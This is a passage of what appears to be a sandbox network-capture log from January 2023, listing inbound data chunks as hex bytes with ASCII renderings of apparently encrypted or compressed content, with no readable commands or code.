xhgoOi=P\|;BRN.\|{)15blwCD]0GFUq'U4(J+9Mr1w;+]w3}$$NC*FQq%QBA+B&5A>T"WwWv7\|&=%f_;TJ87c8PbSE:u{
2023-01-03 15:29:20 UTC	480	IN	Data Raw: b7 da bf 4c 36 73 d3 57 e1 70 d6 66 5e 71 73 08 5e b4 92 af 60 1e 63 39 14 2f 06 70 56 73 70 38 54 d2 eb a4 0a a4 36 fc f8 dd cb fc b5 92 19 15 51 69 62 0e 1c 91 9a 6a 15 72 2a a6 f9 01 27 b6 68 11 c3 65 05 5d 44 96 44 f6 c3 60 5e 16 6b 9e 18 81 bd 1a de 34 3a 89 37 6e be 05 e8 c0 26 bf ec eb af 73 7b b3 e0 94 02 4b 92 bf 9b 07 b6 06 95 48 65 9e 2c 5d 7e c4 0e a5 46 7c 60 23 55 03 fc 89 09 5d 63 e9 58 dd dc f4 be 37 57 b3 a3 2c e1 97 70 0a 69 60 c2 50 64 79 e8 35 08 ac dc 25 fd 4b 94 f7 c7 26 0f b9 f1 ca a3 7f 88 c0 61 5e c0 3b 62 c5 74 40 e7 3d dd 0d f9 af 89 7d ce d3 6a 45 05 82 45 c5 fa e3 a7 60 50 45 d6 be 0f 33 14 8c 54 f5 38 f1 e9 47 ca 6c ab de 69 dd b6 68 33 bf b5 03 c6 74 de 65 5b c7 8f b9 b6 87 43 f9 82 2c d9 d1 30 a8 8f 2f 65 4d db 07 0f 9b db Data Ascii: L6sWpf^qs^`c9/pVsp8T6Qibjr*'he]DD`^k4:7n&s{KHe,]~F\|`#U]cX7W,pi`Pdy5%K&a^;bt@=}jEE`PE3T8Glih3te[C,0/eM
2023-01-03 15:29:20 UTC	496	IN	Data Raw: f2 70 62 ea 97 7e 03 85 b9 09 2e 9c 5b 7e 1a 64 21 e4 d7 91 ff 1c 37 ed 71 19 6a 89 b0 57 2a 50 e4 21 8e b6 4b 23 0f 22 27 4c 24 0c 7a b3 cb 92 7d ef c7 2f ff e4 2f b4 47 c9 ab f5 ec a9 fb 62 78 86 fe 9c f9 cb 2b 9f 21 29 56 09 12 43 32 64 b0 47 59 95 ca 85 4a 8e 46 06 0c b4 77 0d 81 51 1f 97 a7 15 35 b8 ca 4f 64 08 75 c5 8c d9 b7 fd 59 b3 99 1c 62 fa e6 1b bc 4c b0 fe f2 87 f1 5b 83 8a d2 23 3d c0 4a 55 38 75 fd d8 1d 6b 79 b2 af a0 a9 c1 f7 c1 3d f2 2a 9a 2e 27 82 c9 8b a0 f0 d6 cb 68 28 8c 49 d9 c3 9f c1 ad 90 67 ae ae 0a 4f 3b 59 f3 f0 6e a6 b8 aa 5a be e8 2f 92 c3 1e ca b6 ac e3 65 8c 17 00 9b 58 6c 41 d2 a6 48 68 ee e5 47 de 44 4e dc 6e c9 3a 6c 65 1f 6e 2c 95 28 a2 4a 69 5f 70 3b 24 a6 e6 30 66 e4 73 21 20 90 4c 06 a5 09 bb 61 fe dc 14 5b 03 0f 25 Data Ascii: pb~.[~d!7qjWP!K#"'L$z}//Gbx+!)VC2dGYJFwQ5OduYbL[#=JU8uky=.'h(IgO;YnZ/eXlAHhGDNn:len,(Ji_p;$0fs! La[%
2023-01-03 15:29:20 UTC	497	IN	Data Raw: 5d c1 f3 ca 95 ef ab 0a 27 36 19 95 cc 91 38 27 b9 45 f3 3b 8a d0 d8 c3 72 e7 8f 60 f3 19 35 24 20 e2 ee b1 e2 73 05 62 1f 19 cb eb 54 2e f1 c6 39 63 a2 1e a6 2a fc 19 96 02 ed e7 e3 3f ac 91 b0 d9 5d 52 89 e6 62 73 32 12 00 36 89 45 f8 08 83 3c a1 51 51 a8 45 f2 9d ea d8 aa b6 0d 8c ed fd 8c b3 b2 c4 15 ea 0c 3b 1d 68 84 70 88 d2 08 6d c4 05 e9 b1 cc b3 0a e7 d6 85 95 c2 2c a3 fc 5f db b0 e1 de 35 91 47 b7 e6 cb e3 0e c1 32 87 95 17 cf 1c 5b 0d 30 6b d1 a0 99 18 0a 0e 75 b3 33 97 e5 21 ee aa 8a ec b3 07 a3 5c 70 88 24 73 1f 28 ba c4 cb da bb 73 f0 96 eb 7c 44 eb 11 2b 61 81 92 5a ba 7e a9 35 e3 13 c5 c6 62 42 88 46 ad e8 ea ff 82 44 cc 40 d0 cb 15 8a 5a bc cc 65 25 48 c5 33 b5 f0 cd e9 c3 e6 d7 ac 60 ee e3 73 52 58 eb f8 0d c4 98 b2 09 42 f5 2c ee 19 f7 Data Ascii: ]'68'E;r`5$ sbT.9c*?]Rbs26E<QQE;hpm,_5G2[0ku3!\p$s(s\|D+aZ~5bBFD@Ze%H3`sRXB,
2023-01-03 15:29:20 UTC	501	IN	Data Raw: d5 48 3f 61 00 c5 98 4d 69 a2 4d bc 28 6d 33 9c 79 97 aa bb ec 07 3c 1e 2a cd aa 19 06 c8 27 b7 63 4a 8c 1d 73 75 1d d4 b5 07 43 c1 54 ec 60 96 52 02 8d 91 95 45 23 93 68 fc 2e b7 f7 19 c1 dd 97 14 ff 08 a6 ff 50 43 b6 a6 47 2d 8a 45 52 50 25 ca ef 9d 19 08 5d d3 2c 6a aa 52 a9 64 b7 98 d5 26 ab 60 e2 9e e8 ba 54 d1 b7 c5 dd f3 f3 6e fc a9 9a 21 b1 12 f6 9f d3 47 8a 82 fe 79 85 67 c9 b4 72 7e 19 39 28 48 53 ab 4a bd 00 4e 12 1d 3e a3 fe 1a f5 1d 31 45 85 f0 b2 ae 82 fb ab 8a a3 39 26 b7 a2 e3 32 98 3e ff 5d 32 34 bd 03 cc 72 fc 08 0b ad 41 17 84 76 bc 9e cf bf 38 ac 90 2a 17 77 ff e9 7e 3e 27 b6 69 4f 8f fe 63 be 18 f8 f9 f4 d8 c7 5e 54 ab f6 b6 f8 d1 64 1a 94 38 47 73 75 59 8c 2c 10 e9 b2 90 40 07 20 a7 5e d9 53 ec c4 b0 f1 14 a0 9f b1 35 6e 64 44 aa 8d Data Ascii: H?aMiM(m3y<'cJsuCT`RE#h.PCG-ERP%],jRd&`Tn!Gygr~9(HSJN>1E9&2>]24rAv8w~>'iOc^Td8GsuY,@ ^S5ndD
2023-01-03 15:29:20 UTC	517	IN	Data Raw: 5c 91 31 45 ac ee 7f ab 4a b8 7c 75 29 0c 9a 1f 1d eb c9 d2 2e e0 d6 9b c9 51 d8 76 3d 8c d9 87 26 79 ac 0d 94 59 d1 69 c6 23 a4 0a 94 b2 55 64 3b 7e 63 ec 4c 08 c5 7e 8c 39 b6 7a 67 a0 92 3f b5 aa f3 ed 77 57 da 12 13 c4 eb fc 7a a6 72 d9 8e ef 8e 52 f1 9c 64 48 28 a6 58 fc d5 97 4e 17 b8 00 45 2d f9 01 33 83 f4 0f 70 b5 f0 08 b4 a3 b5 4d 74 d1 c4 e2 b0 11 74 6d e0 05 38 6e 59 e6 0d fd b8 18 e9 e2 b9 90 6a 52 01 4e 32 56 9f 4a d0 01 47 93 4d 0a fb 31 c8 58 14 f1 1a 41 01 ac ef ec a4 eb b1 53 53 d5 4a 8d 1e 5f e9 94 95 2f f7 68 c3 83 a4 25 46 95 d9 9a 30 ad 99 6d 50 25 fe c2 dd 3d 3e 5c b6 3b 5e 26 20 dc 25 ea 97 9c 7e c8 a8 8e 9c ca c4 09 20 8a 33 6c 06 a8 05 a8 03 69 83 6e 71 ba ba 68 de ac 17 c1 0d e8 8d fb 16 fd c3 98 bc 73 08 4d a2 fc 59 05 1a 9b 61 Data Ascii: \1EJ\|u).Qv=&yYi#Ud;~cL~9zg?wWzrRdH(XNE-3pMttm8nYjRN2VJGM1XASSJ_/h%F0mP%=>\;^& %~ 3linqhsMYa
2023-01-03 15:29:20 UTC	518	IN	Data Raw: c8 88 da a2 85 c0 9b 65 87 0c f5 e9 97 ff 33 2d 51 d2 13 1d 7d 70 32 45 1e dd af 55 ff d2 53 e6 2d 52 77 22 7a b1 8e 78 18 44 95 62 03 d1 fa 57 5d 15 80 64 1e e4 fe 29 3b 0f e8 f7 10 8e 93 79 a8 0b 0c 49 bd 27 d1 93 3d 10 3c f2 61 11 8a 55 03 fc 6d 84 fa e1 08 4b ac 48 34 a0 06 50 ec ad 09 43 96 3c 19 53 8e 84 b8 66 e8 f4 88 fe 72 05 29 48 50 7c a4 75 a1 38 9c 0b ec f9 65 ae b8 fd a2 91 48 a3 ce af 51 db 60 c7 f2 05 e8 e4 b7 6d e2 fe 7b 4a 25 e9 1f 94 8a 62 2e 70 56 92 8b 19 6b 1e 49 be 59 56 e3 13 51 9f 55 60 27 cd 51 b6 71 ea 50 9d af ab 5c 0a 9e f4 1d 10 e2 40 2e 87 0a 1c c5 45 60 92 70 d9 af a0 3c 88 ca fc e7 ff 74 a7 fc f7 bc b6 62 8f 6d b9 14 25 cf ec 1b 3c d9 91 ba fb 51 49 fd df 04 fc ff c4 97 4d 85 c6 5a 10 19 0d 16 aa dd e3 37 98 03 f3 23 ee c7 Data Ascii: e3-Q}p2EUS-Rw"zxDbW]d);yI'=<aUmKH4PC<Sfr)HP\|u8eHQ`m{J%b.pVkIYVQU`'QqP\@.E`p<tbm%<QIMZ7#
2023-01-03 15:29:20 UTC	518	IN	Data Raw: ec d8 c3 bb 16 8e c6 24 55 43 72 37 aa f8 1e e1 57 ab 44 a9 82 33 ed 92 ff 46 a6 85 b0 41 ae c6 d5 f4 dd a1 31 33 0d 16 49 71 a8 4e 04 12 55 c9 98 d9 46 69 a4 33 d1 f4 85 08 7e 73 e5 0c db 8e 14 93 d7 4c f9 59 b0 10 c9 35 e5 4e c7 df fb 55 2a c8 b0 18 fb 96 74 65 ea 52 5c 27 b5 ec c1 da 0f dc 2e 06 a4 ac 67 e5 77 65 7a 70 22 02 23 e4 17 b2 8d 58 4e 09 1f ec b8 7a 5f 01 dc 26 4c 30 d3 8b 88 0a 31 be 07 03 9b 7f ae be 34 f6 82 aa 94 d0 7c 98 43 c4 b9 2c 08 74 e1 b2 61 ac 5b 95 ca 80 17 19 bd e0 dc 63 21 6c 51 4b 1a e8 e2 c9 18 5c 92 be b3 e5 7a 59 21 e6 7b d3 43 48 ae 79 78 08 1d b2 23 21 7b 6b a0 74 36 80 d8 20 46 5d 35 60 55 14 d5 42 90 85 1c 06 c1 d9 d4 3b e3 17 84 a9 4a 50 d7 6e 8e eb 65 b9 d2 ee 25 3b 15 ec 4f 13 66 59 83 aa a9 72 27 71 63 76 e0 2c e5 Data Ascii: $UCr7WD3FA13IqNUFi3~sLY5NU*teR\'.gwezp"#XNz_&L014\|C,ta[c!lQK\zY!{CHyx#!{kt6 F]5`UB;JPne%;OfYr'qcv,
2023-01-03 15:29:20 UTC	534	IN	Data Raw: 88 79 0b 57 57 b5 33 f0 c3 b1 6f f2 db 8f ab 72 59 b5 50 16 12 a8 4e 55 8a da d2 31 6b 05 d2 a3 1f 9a 86 c5 90 b6 14 49 db 4b 4b 2f fc 93 04 fc cd 61 ea 97 1a 92 38 9c 39 23 ce 92 ef c2 23 5c 85 7f a2 aa 90 e0 5f 79 e1 90 53 f9 e8 7e b2 e7 52 74 6b b0 27 db 9a 87 8e 7e b8 ae 0f 99 a8 6c 23 71 1e ad 2b 70 6b a3 18 ef 8d fb 72 44 6d 51 4b 1d a3 7e b2 c8 a8 b9 cc b8 d7 0e 9d 56 14 ff f0 b7 ae 0d 81 2f 8a 7f 0f 95 b0 17 b4 36 13 f7 65 fd ac 09 53 67 b9 fa 33 d3 a1 f8 7e 0c 42 bf 8c 4e be 97 06 da 76 70 a3 db 00 6e 60 2f 1f a4 e8 8b 5d d3 a0 5e 85 e4 95 30 d7 37 11 29 56 19 60 1b c9 e5 27 82 f3 29 d9 3b 3a 36 dc 6a 99 74 92 16 fe d1 b3 62 78 c5 01 1e 13 b9 f7 41 77 54 35 ca 4a a3 6a 45 5e f4 8e 2c 2c 86 88 18 2c 0e ca 92 1f 9a 56 e9 02 ae cb df d0 12 d9 ed 22 Data Ascii: yWW3orYPNU1kIKK/a89##\_yS~Rtk'~l#q+pkrDmQK~V/6eSg3~BNvpn`/]^07)V`');:6jtbxAwT5JjE^,,,V"
2023-01-03 15:29:20 UTC	535	IN	Data Raw: 35 8d 8d cd 0d 58 00 7d 78 e4 cf 5d 3c e2 80 1f 3f c4 9d 53 0d ad 6d 61 29 f4 57 c3 e3 30 58 2b ac 6d 35 14 78 61 fd dd 13 b6 92 eb 51 38 5e f9 fb 7e 90 5e 08 36 03 e3 fc 1a 03 83 75 c3 0e 12 60 29 d9 71 c6 c6 b0 00 2f 58 28 b2 b0 7d c2 bb 77 04 30 d8 6a 78 64 34 0a 2a 2a 0c b6 05 3b 80 95 c3 91 a8 fb 64 1d 84 a5 e2 e2 e2 c2 66 be 21 22 22 7e fc 48 a3 a6 ff 25 28 ba b3 ff 0a 06 0b 4d 80 d9 0a f3 7f 8b 97 71 4d 2e ab ae 11 13 13 7b 78 78 a0 a4 a4 0c 09 0d 85 87 87 87 9d 77 5a 59 59 35 b9 a9 c1 da 84 b3 b3 73 e2 e3 e3 57 24 0c dc dc dc 3e 7f fe 0c cb 45 e6 e5 e5 6d 6e 6e de 84 c1 30 15 00 67 67 67 5c 5c 5c 7f 3e 30 c8 c9 c9 c1 6c bf 89 3b 25 2e 49 2b c0 72 5b ed ec ec 4c 4c 4c 2a 2a 2a 9e 86 47 95 94 94 59 58 58 e6 e7 e7 35 00 2d 3f a3 63 95 3c d2 ea ea ea Data Ascii: 5X}x]<?Sma)W0X+m5xaQ8^~^6u`)q/X(}w0jxd4;df!""~H%(MqM.{xxwZYY5sW$>Emnn0ggg\\\>0l;%.I+r[LLL*GYXX5-?c<
2023-01-03 15:29:20 UTC	550	IN	Data Raw: 4d 34 33 1e d3 53 a8 b3 03 e2 8d b9 ec e3 66 f1 61 36 52 61 91 7c b5 cc 65 03 b4 f9 58 9c 4c f4 ba 81 ed 7c e4 9c 6b 78 54 c6 f4 fb b5 ae bd 48 32 de ae 82 f5 b4 f9 cc b1 85 ba fd 1e a1 60 c0 57 d3 bf d1 2f aa 73 84 81 27 16 a3 32 19 39 e1 b3 71 08 fd 54 71 a7 9e d6 f2 c9 47 96 c2 d6 31 5b df b2 4b 12 9c c2 60 ff 09 b9 dd e7 34 34 fb 85 dc dc 32 f6 4f 06 31 23 bb 3c 08 c3 89 66 29 89 1f a2 40 a4 d8 bb 2e 84 6e 37 13 9f 55 d2 06 6f 39 46 c7 c9 e5 5d 18 23 f7 7d ed 08 ef ef 0a 0e 43 f2 eb e8 44 78 9b 7f f1 88 05 84 75 1f d8 7f 4f c9 3e e7 db 24 2b 4a 46 4d f8 9c 1b e4 eb fb 0e 34 cf ff 77 92 9d 55 45 a5 f8 88 34 75 98 31 ed b2 c9 8d c1 29 a8 5d c1 f4 3e b6 b0 8b 5d 60 cb cd b8 3b 68 80 52 9f 88 42 b5 8c 9e ae 94 e9 a8 2a 7b 19 80 21 39 35 de a6 a8 80 a3 00 Data Ascii: M43Sfa6Ra\|eXL\|kxTH2`W/s'29qTqG1[K`442O1#<f)@.n7Uo9F]#}CDxuO>$+JFM4wUE4u1)]>]`;hRB*{!95
2023-01-03 15:29:20 UTC	566	IN	Data Raw: a4 6b 32 b9 db 77 f7 7b e9 66 d1 c8 f8 29 aa 1b 2b 12 d3 92 2b 0e 6a 90 37 94 b4 bd 83 ab 33 6e 20 e6 de 26 9b 74 c4 98 38 70 37 52 68 d2 9e ba fd 16 8a ad 1a 2f fc be f8 35 88 57 19 bb cb 82 94 af c3 9c 93 2b 27 be 40 15 ef 3a 47 d3 87 c5 55 b4 30 f0 71 42 97 b5 f1 9e 2f 9f e7 24 53 50 54 c2 a0 2e c6 90 6d c2 0f 76 1d ef 3d 1d ad 49 c8 9d 0d 9b 53 25 d6 8d 90 5f 83 92 6a 27 ab 78 cb 6f d6 8d 75 73 e7 c2 2c 89 27 94 e7 3e f7 4d 2b 96 ca 69 3a 4e 4d a8 c7 aa a4 04 d8 0b ba 26 9a e4 f7 c0 f9 d7 7d 59 5a 2f b1 78 1e 14 f5 90 8a f7 ca 5d 21 81 c4 4a 1f 30 4e cd 0f 7c 60 e8 7c 10 dd d4 01 42 23 db 69 fd 09 bf 74 98 96 53 56 2d 74 8a ef 3e 1b f2 e4 18 28 a9 3b c7 45 74 3a 5b 6c b6 51 75 0c 09 d5 c0 c5 0d 59 2a 32 c9 0b c0 b0 10 08 b2 7a 04 a4 2e de ae cc a7 3d Data Ascii: k2w{f)++j73n &t8p7Rh/5W+'@:GU0qB/$SPT.mv=IS%_j'xous,'>M+i:NM&}YZ/x]!J0N\|`\|B#itSV-t>(;Et:[lQuY*2z.=
2023-01-03 15:29:20 UTC	567	IN	Data Raw: 0f a1 49 5c 5f 73 12 a1 9f 92 f2 b6 46 fb 3d c7 36 f6 b6 09 3f fd 27 e2 b2 e2 68 92 b8 dd 52 aa c1 20 bf 16 47 a9 5c 3d a4 c6 ec 45 80 15 47 b3 f5 6f b4 85 aa 06 01 27 df 8a 20 7d a9 74 91 30 6b 48 05 ac 27 3b 76 2f 5e 11 c2 c1 83 f6 2c f0 0d bf 88 c9 5b e5 3f 1b 4a 9a 5d bb f1 cf ac 19 b8 53 d8 fb 5a e3 24 37 b3 4f 01 82 be 4e 0d 51 2c 29 c5 28 7f aa 22 fb 84 0f 7a 20 34 0d e9 c3 99 6e d0 56 c4 3e f0 b0 64 e3 8a d5 e1 e8 b9 e7 69 a9 31 10 fc 8c a9 09 8a fd 48 21 1a 62 f2 36 ff d1 9d 97 d3 57 40 44 ba 5d 9b db 41 c5 f7 25 c2 96 bc d6 4f 72 69 9a 69 7d e3 e3 c4 00 e5 c7 e5 7b 78 98 b0 54 ac f2 cb a0 48 b6 72 1f d0 a9 4c b1 7f c9 03 17 3d 06 b6 50 35 86 ae ab d2 a0 51 4f 28 d4 51 1d 1c 4d 8c 3e d2 b8 df fd 7d 21 f8 dd 64 da 1f 98 d5 2e 0c fb d3 42 c1 79 75 Data Ascii: I\_sF=6?'hR G\=EGo' }t0kH';v/^,[?J]SZ$7ONQ,)("z 4nV>di1H!b6W@D]A%Orii}{xTHrL=P5QO(QM>}!d.Byu
2023-01-03 15:29:20 UTC	571	IN	Data Raw: 31 ed 90 92 f7 e0 06 fa c0 b9 d1 fa 50 a8 fd af 24 f0 c2 71 bd 28 96 84 08 03 40 6c 59 42 78 b8 c8 60 fe c8 86 50 b9 e0 fc c6 f2 80 2c e8 9b 5d 36 b8 e5 b6 1d 30 7e 80 5f 08 d8 a0 d8 46 6f b1 78 0f 9a 9b 00 11 6d 4a 94 ab a1 01 42 e1 8d 4a 6d 67 8c e3 a0 a9 c6 d8 b2 81 58 b0 a0 66 12 49 cd 23 05 21 34 89 c9 08 80 bc d7 8c 5c 42 2c 64 8a 9c ae f5 72 23 f2 f0 7e 7f 8c 80 d1 15 41 21 d4 7e d2 2f ed fb a1 09 e6 50 8e db c6 83 ed c3 50 e6 ed d5 8f 32 05 31 80 10 43 3d 47 7b a1 89 9a a6 1c 18 06 aa eb c6 00 0c e5 08 47 12 ad 6f d6 03 0e e8 ad 4d 81 3d ff 34 29 bf 75 04 91 3c 26 46 eb 85 75 5e 30 c7 03 2a 6a 84 08 f3 17 73 ff b3 10 48 b9 83 8e 48 4e 08 b4 d7 8a b0 7f 00 11 16 67 bc cd 13 cd 30 93 3c 7c 3d 9e ec ec cb 1b 9b 46 7a a2 4a 09 28 04 fb 4b cc a4 3d 4c Data Ascii: 1P$q(@lYBx`P,]60~_FoxmJBJmgXfI#!4\B,dr#~A!~/PP21C=G{GoM=4)u<&Fu^0*jsHHNg0<\|=FzJ(K=L
2023-01-03 15:29:20 UTC	587	IN	Data Raw: af d6 ac 59 3a 1d c4 f4 97 83 4d 56 b0 86 d9 29 f1 40 1f f2 bb 3a 1e 99 e3 a4 9e f2 61 30 6e 6f bc 55 d4 a3 12 57 fd a9 54 59 f2 86 60 d3 75 d0 dc 4c 07 af 2d e7 6c 74 8a 1c b4 43 1f 05 1f c6 b1 2c 6b e3 31 91 f3 82 30 e0 25 16 9e 62 67 86 2d 06 6e f8 1f 96 19 61 0e c1 b3 2c 67 7b a0 cb bc 34 2b 6f 6f d1 9d 5e bf a0 94 40 86 db 77 39 b6 1c 64 52 8a b0 39 e1 14 e1 be 06 c9 7d 9c 96 02 9a f2 a6 97 85 30 6d 69 fc 60 0d 27 e1 a2 41 5f ce f8 75 68 4e c7 76 02 b5 9f f8 6c cf d1 fe c9 8f 82 8b 26 4e c1 ff 6b 57 60 8b 25 2b b1 1c f4 be c2 a5 ba 8a bf fd 92 5c 1e d7 27 bc 0e 02 25 b0 61 57 e1 12 9b 60 67 c4 cb fa 33 6e 1f 1f 3e eb 2d e7 b2 71 2a 92 52 97 e7 06 14 ca b6 77 45 38 2f 8e b8 67 11 6f 15 0e bb e5 5b 1e 72 fc 9a ae b3 74 1d 8e 74 f3 0f f4 d2 e1 9b 3c ad Data Ascii: Y:MV)@:a0noUWTY`uL-ltC,k10%bg-na,g{4+oo^@w9dR9}0mi`'A_uhNvl&NkW`%+\'%aW`g3n>-q*RwE8/go[rtt<
2023-01-03 15:29:20 UTC	588	IN	Data Raw: f3 a3 05 01 0d bc 15 bc cc c4 3c 75 65 fb ad 4b 1d 40 1e 48 17 24 af 64 72 34 55 dc c2 d4 af 4b e7 19 0c 06 03 07 25 59 1d 52 fa 9f 72 6e dd ef 95 cd fd ee 86 cf dc 09 f7 ee 73 d5 12 c4 1c ab fb e7 a1 0f b3 9f 4a 2c c5 8b d3 f5 4d 7f f5 74 1e 2c a2 30 17 61 d3 1c 71 ed 0f 29 ed a5 06 3c 24 19 79 52 91 be e7 4e 2b 92 b1 55 58 98 95 9d 96 0a 2b e4 d5 bc 30 6e c9 ab 4a e7 2e 3f e4 f3 05 aa d5 74 2c 8e d0 ad b4 db f8 d7 67 23 a4 ee 45 06 74 59 5a 72 8b 27 05 af e3 71 db 95 bd b0 71 33 ed ac d8 cf 03 d9 f0 7c 2f 29 e3 ed 7a cd 84 14 17 cf 64 ab f5 0a cc 5b 23 4d d6 3f e3 63 43 62 8d 15 86 16 f6 c7 b1 b5 bc 45 bc 48 b6 6d 0c 47 45 57 94 59 a8 e3 62 75 ac 5d 31 f5 c3 e5 35 3e 52 30 af 22 17 18 5c ab 65 dd a3 15 0a d1 cd c2 a2 26 0d cb 26 17 0e d9 85 6f 0a f6 f3 Data Ascii: <ueK@H$dr4UK%YRrnsJ,Mt,0aq)<$yRN+UX+0nJ.?t,g#EtYZr'qq3\|/)zd[#M?cCbEHmGEWYbu]15>R0"\e&&o
2023-01-03 15:29:20 UTC	603	IN	Data Raw: ca 0f 3c 3a 34 f0 2d c5 c2 d0 d9 1b ba 27 93 b0 a2 af 3f be c5 e6 bf ca 1e 4e f1 10 f6 e8 ba 82 05 62 be fe 2e cd 74 87 ca fe 0a 00 a6 cd 43 22 84 16 e4 2d 28 26 ea 34 a1 02 2e fe 5a 7d 7b 03 90 29 9e 3a 72 31 d6 62 82 3b 4a 0a bc 5b 31 7b 0a bf fa b5 b1 73 26 63 31 50 be a8 cd f5 9f 4e 63 a0 40 02 73 32 54 ad f6 97 8f 57 d3 b1 ae 96 97 e6 c1 49 12 95 f3 65 cf fe 11 80 c3 db ab b7 28 60 b3 94 8b 35 8f 2e d2 20 55 6d 39 ac 8f e7 f5 a2 88 23 d5 cf b3 2d b2 bb 6f 37 ff b2 22 28 ba 4f d0 3e 15 15 b1 b6 58 99 c2 68 b4 24 fc 76 b1 e4 8e 5f c3 c6 7c da f5 52 32 c6 79 76 56 ff 2a 1d 6f be e6 4a d2 e3 f1 84 cc e3 ea e1 51 e5 2f a1 7f c8 54 8e 46 06 18 7e dc c6 4a a0 61 23 d1 28 51 ba 4e 8a 10 0e ac f7 18 26 75 93 58 66 4f 52 e0 84 9f d3 83 e2 74 5b dd 3a d5 0f 2e Data Ascii: <:4-'?Nb.tC"-(&4.Z}{):r1b;J[1{s&c1PNc@s2TWIe(`5. Um9#-o7"(O>Xh$v_\|R2yvV*oJQ/TF~Ja#(QN&uXfORt[:.
2023-01-03 15:29:20 UTC	619	IN	Data Raw: 86 39 a1 1d a0 8f 32 47 5e ac b5 df 5a fc b9 84 a0 ab 9c 3e 43 db aa 79 cf dc d7 9d 8f df d7 ed 52 ed 9e fc 31 93 66 f0 81 f0 d8 a8 38 83 65 14 76 c0 6a 6f 3f 13 46 82 43 0f 97 35 a6 4f a6 2e c6 e7 63 10 d7 26 5c 5d aa e1 b2 b8 22 90 2b 2d 6a 2f b7 c1 2a f9 4d f2 91 8f b8 f1 27 b5 e9 38 ab c4 26 bd ba 6c 28 70 a6 6c 30 f6 66 98 44 8f c8 0a e6 f3 99 e0 78 50 b0 5d 3c 5f 54 65 2d c4 48 56 4c 7b 2e 05 63 32 e8 77 04 bd bf d5 89 e6 34 37 a2 6b d9 fd 47 b3 c3 0c 50 37 9d 81 28 46 18 07 5f 75 2d 1e 79 fc 73 e2 a0 30 e1 29 2e 6c 35 4d f0 96 9f 2e b9 3e 37 29 16 c3 85 42 9f 23 12 d5 94 4a c9 73 91 e1 20 0c d4 71 64 a6 e2 f6 c3 c3 7d 8a b3 e5 4f 8f cb 47 22 88 09 b4 6a c9 29 24 5b 57 67 1e 64 be 84 0b b3 57 44 9c 9e ce c7 f8 b1 c8 74 73 6e e8 7c 40 32 8f c0 4b 6b Data Ascii: 92G^Z>CyR1f8evjo?FC5O.c&\]"+-j/*M'8&l(pl0fDxP]<_Te-HVL{.c2w47kGP7(F_u-ys0).l5M.>7)B#Js qd}OG"j)$[WgdWDtsn\|@2Kk
2023-01-03 15:29:20 UTC	620	IN	Data Raw: bc 2c 9b d5 3d e8 5f 31 bf 6d 17 fe d0 67 fe 24 ac 84 98 23 56 ee 7b 4d 84 f8 e1 2d 06 d2 47 a4 42 22 42 65 74 39 c4 9c fe 77 cd 43 75 ee 67 a7 2b 67 8f 4f a3 c3 49 3c 4c ce c6 d6 0b da 4e 51 6b a2 08 ce bb d3 6b 0f 69 4c 57 2b 4c 3b ab 25 2c 16 b3 fc be 1f 60 91 49 c4 22 e5 b0 62 d9 55 94 94 f8 5f 6f af 02 8d d4 be 72 34 f4 c8 7f 50 f8 fb c4 3e 0b 08 f9 77 d5 f5 33 fa ff dc 71 15 f8 ef 8e 2b 37 ee 77 40 38 4e 27 64 7d 29 c5 23 a8 da d7 69 10 29 53 4e 28 73 1c 9e 14 95 a0 9a 49 83 40 e6 cf 13 23 24 58 23 c5 89 b3 b7 87 18 55 c2 b4 3d 98 68 5f 71 06 4b f5 e1 87 f0 c7 d5 dd aa a2 d4 d7 77 7e 90 0b a3 12 8d a7 40 e7 47 af fa 49 ae 34 ee c5 d1 6b f1 d6 50 9e 2a 57 ce 12 66 55 75 0c ae 52 2e 5e 71 3d 9c b3 87 a3 2a fc 70 fd 92 81 92 20 1b 6a 74 ad 2e f2 d2 4b Data Ascii: ,=_1mg$#V{M-GB"Bet9wCug+gOI<LNQkkiLW+L;%,`I"bU_or4P>w3q+7w@8N'd})#i)SN(sI@#$X#U=h_qKw~@GI4kPWfUuR.^q=p jt.K
2023-01-03 15:29:20 UTC	624	IN	Data Raw: ec 7d 2e a4 22 12 26 4f e5 2a 26 2a 15 1f 26 9b ca 45 7d bc 3b 26 56 0d a3 36 33 ca 28 49 b1 8c 7c b4 1a 5d 09 d2 3d 8c 70 65 88 7d a0 cf 8d b2 eb a2 d2 3a bd 08 29 08 5d 66 63 86 5b e4 56 e4 df 8f 6c 04 cf b7 44 d7 3a 6c 16 81 9d de ab 53 08 ea d2 3a 3d 20 6c 1e 3f 94 31 8b 08 63 67 e7 4e 7f f5 e2 e9 23 7c 79 e4 be 96 68 9e 69 e3 ef 01 c8 a8 c2 61 33 cd 51 96 08 ed ea 59 0e 31 2c 31 67 c2 97 93 33 93 0e ff 70 47 ca 04 20 d9 00 78 41 42 fc 9e 3a c7 ca ab 4e 7b 4c 93 d4 24 a8 6a ba 7e b6 f9 8b 23 51 87 4b 14 fe 90 2b f3 bd af 67 0f 7f 4f 12 c9 40 1a bd 74 a7 fa eb 98 cb 62 7c 33 09 a9 e1 f0 79 94 7d 23 fa f1 3c 23 e2 c5 37 43 c7 91 cf cb dd ea 6b aa f3 0a 71 43 96 99 66 8d 5b 03 dd a7 9b e4 30 69 2a 04 ca cc 1d ca 2b b3 80 41 84 45 21 8a 58 e5 73 f3 b8 84 Data Ascii: }."&O&&E};&V63(I\|]=pe}:)]fc[VlD:lS:= l?1cgN#\|yhia3QY1,1g3pG xAB:N{L$j~#QK+gO@tb\|3y}#<#7CkqCf[0i*+AE!Xs
2023-01-03 15:29:20 UTC	632	IN	Data Raw: 81 c7 e4 0a fe e6 b2 9a ec 20 46 5b 62 aa ac 2c 3b f9 f8 7a 8e 31 8f 44 50 40 94 70 8d 1b 7c d7 73 d8 7d d4 c5 ee 38 c6 25 f6 17 c5 29 c2 bf 1b 17 13 b5 33 1d e2 b7 9f 43 97 7b 53 b4 8f 37 41 c6 07 d3 f3 91 05 f6 1d 0e e4 fc 1a de 99 cf 81 c6 66 8f 5b b8 ec f7 45 f6 d3 55 de d1 39 65 fb 7e 99 7b 36 78 42 82 3c c8 ef 9c 59 9f b6 0f c8 1f 97 b9 5e 2f 50 90 e3 0b 07 fa 5b e1 bc c3 02 28 39 56 de 61 39 06 6b 5b c6 c9 91 a5 66 97 1e eb 78 4b 92 35 eb 77 98 a4 68 f8 68 fb 6e ca 76 08 78 2e 0f 95 5c 5e 7f 77 71 12 48 54 da fa 74 ef ed 59 1c 5b d4 fe 85 4e 42 bb 07 8d 5d 8e e6 d6 18 a3 ab 60 4a b9 32 ff 14 42 5d 4f 36 fe 26 23 d6 d1 a5 ee 37 44 08 85 42 88 0f 1f 0e 34 df 6b 99 71 